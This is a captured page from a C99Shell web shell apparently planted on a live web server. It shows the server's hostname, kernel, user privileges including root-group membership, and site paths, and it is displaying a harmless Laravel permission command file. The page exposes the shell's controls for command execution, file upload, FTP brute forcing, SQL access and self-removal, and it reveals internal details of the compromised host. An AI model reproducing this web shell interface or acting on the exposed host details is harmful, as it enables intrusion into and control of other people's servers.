!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/qr.picotech.app/public_html/vendor/spatie/laravel-permission/src/Commands/   drwxr-xr-x
Free 23.47 GB of 117.98 GB (19.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Show.php (1.79 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Spatie\Permission\Commands;

use 
Illuminate\Console\Command;
use 
Illuminate\Support\Collection;
use 
Spatie\Permission\Contracts\Permission as PermissionContract;
use 
Spatie\Permission\Contracts\Role as RoleContract;

class 
Show extends Command
{
    protected 
$signature 'permission:show
            {guard? : The name of the guard}
            {style? : The display style (default|borderless|compact|box)}'
;

    protected 
$description 'Show a table of roles and permissions per guard';

    public function 
handle()
    {
        
$permissionClass app(PermissionContract::class);
        
$roleClass app(RoleContract::class);

        
$style $this->argument('style') ?? 'default';
        
$guard $this->argument('guard');

        if (
$guard) {
            
$guards Collection::make([$guard]);
        } else {
            
$guards $permissionClass::pluck('guard_name')->merge($roleClass::pluck('guard_name'))->unique();
        }

        foreach (
$guards as $guard) {
            
$this->info("Guard: $guard");

            
$roles $roleClass::whereGuardName($guard)->orderBy('name')->get()->mapWithKeys(function ($role) {
                return [
$role->name => $role->permissions->pluck('name')];
            });

            
$permissions $permissionClass::whereGuardName($guard)->orderBy('name')->pluck('name');

            
$body $permissions->map(function ($permission) use ($roles) {
                return 
$roles->map(function (Collection $role_permissions) use ($permission) {
                    return 
$role_permissions->contains($permission) ? ' ✔' ' ·';
                })->
prepend($permission);
            });

            
$this->table(
                
$roles->keys()->prepend('')->toArray(),
                
$body->toArray(),
                
$style
            
);
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--